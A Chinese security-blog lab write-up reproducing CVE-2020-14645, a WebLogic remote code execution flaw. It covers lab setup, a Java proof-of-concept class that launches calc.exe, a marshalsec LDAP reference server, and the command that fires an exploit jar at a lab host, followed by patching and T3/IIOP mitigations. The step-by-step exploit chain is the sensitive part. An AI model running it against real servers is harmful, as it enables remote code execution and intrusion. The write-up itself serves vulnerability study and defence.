其他
CVE-2020-14645:Weblogic远程代码执行复现
上方蓝色字体关注我们,一起学安全!本文作者:纸超人@Timeline Sec
本文字数:973阅读时长:3~4min声明:请勿用作违法用途,否则后果自负
WebLogic是美国Oracle公司出品的一个application server,是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。
构造chain类似于common-collection的chain,可以照葫芦画瓢。
Oracle WebLogic Server 12.2.1.4.0
Oracle WebLogic Server 12.2.1.3.0
Oracle WebLogic Server 12.1.3.0.0
Oracle WebLogic Server 14.1.1.0.0
JDK Version < JDK6u211/7u201/8u191
Weblogic Version 12.2.1.4.0
在官网下载上面的安装包 安装好对应JAVA并配置好环境变量,java javac命令可以执行
java -versionjavac -version使用管理员权限打开CMD执行安装命令
java -jar fmw_12.2.1.4.0_wls_lite_generic.jar无脑下一步
稍等片刻会自动打开配置向导,下一步
完成安装,然后打开startWebLogic运行服务
浏览器访问http://IP:7001/console,至此环境搭建完毕
payload
public class exp{ // POC open calc public exp(){ try { Runtime.getRuntime().exec("calc.exe"); } catch (Exception e) { e.printStackTrace(); } } public static void main(String[] argv){ exp e = new exp(); }}编译poc
javac poc.java使用python启动http服务器,并将poc.class放入站点根目录(我这边指定5001端口)
python3 -m http.server 5001使用marshalsec搭建ldap服务
自行编译marshalsec的jar包:
mvn clean package -DskipTests启动ldap服务,具体启动参数的介绍,查看作者的介绍。
java -cp marshalsec/target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://IP:port/#exp 5002使用下面的工具 (需要mvn编译) ,工具下载地址
java -jar CVE-2020-14645.jar LDAP服务器IP:port/#exp http://192.168.132.171:7001成功(撒花*★,°*:.☆( ̄▽ ̄)/$:*.°★* 。)
1、安装官方补丁
https://www.oracle.com/security-alerts/cpujul2020.html
2、限制T3访问来源
漏洞产生于WebLogic默认启用的T3协议,因此可通过限制T3访问来源来阻止攻击。
3、禁用IIOP协议
可以查看下面官方文章进行关闭IIOP协议。
https://docs.oracle.com/middleware/1213/wls/WLACH/taskhelp/channels/EnableAndConfigureIIOP.html
参考链接:
https://github.com/ianxtianxt/marshalsec
Timeline Sec 团队
安全路上,与你并肩前行